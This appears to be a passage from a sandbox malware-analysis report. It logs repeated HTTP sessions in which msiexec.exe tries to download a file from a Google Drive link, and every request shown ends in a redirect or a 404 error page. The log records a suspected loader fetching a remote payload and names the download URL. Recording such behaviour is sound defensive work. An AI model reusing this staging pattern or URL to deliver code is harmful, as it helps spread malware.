                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:10 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-u1h6YtI4SAGV-4VKXfa3xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.949997142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:11 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:12 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgSf_N4WPUo5YAJ8mWThTymqOGMtqHP_njZvjkK2xzPn_Iu7WDL_W-SW5cBU002hScZhgUPuF-0
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:11 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-h-GZUrZqbbbnGTH4ylVxJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 77 56 48 4f 44 65 66 53 31 48 39 34 38 6c 50 7a 45 42 54 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OwVHODefS1H948lPzEBTGQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.949998142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:12 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:13 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:13 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-gosmIGIl9xE2QOWU88W-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.949999142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:13 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:14 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgQPYXvFopy1EDV35xLVjggWiRaibPJPFlLkCpKToddEZQzdQCc5EjamZPAL7t45eJiO
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:14 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-wMwb2b4_dp2CTiIH_Sj69A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 45 78 66 45 76 2d 71 4d 35 56 71 78 49 55 39 2d 34 36 79 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wExfEv-qM5VqxIU9-46yNw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.950000142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:15 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:15 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:15 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: script-src 'nonce-5XjBejMfc321uZU530QjcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.950001142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:16 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:16 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgQf9h6ntY22_iNSNSsaR5EBSIvm1vNYKIeyUtNwbXV-xW2nmA_8bRrALcS5K28iQKp8ykInK2s
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:16 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-qqeIylw2gDuLDRuv6Vr9nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 7a 6f 7a 35 53 5a 4a 35 37 72 6a 6e 72 76 57 57 71 69 63 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-zoz5SZJ57rjnrvWWqicuA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.950002142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:17 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:17 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:17 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: script-src 'nonce-pBK03dEyx4p3vxpM9mErrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.950003142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:18 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:18 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC5NNLyxqNAhcaGTyf5DrM5r6XkLOaTpfNe1PoIlkPCBaTvS94D_KUzFlkUi-i84UkH1_JMT_EU
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:18 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-7ly0QPrlCxJy_JmbxXVLsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 48 48 50 63 77 77 4e 63 68 7a 46 76 52 71 50 4b 4e 78 4e 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
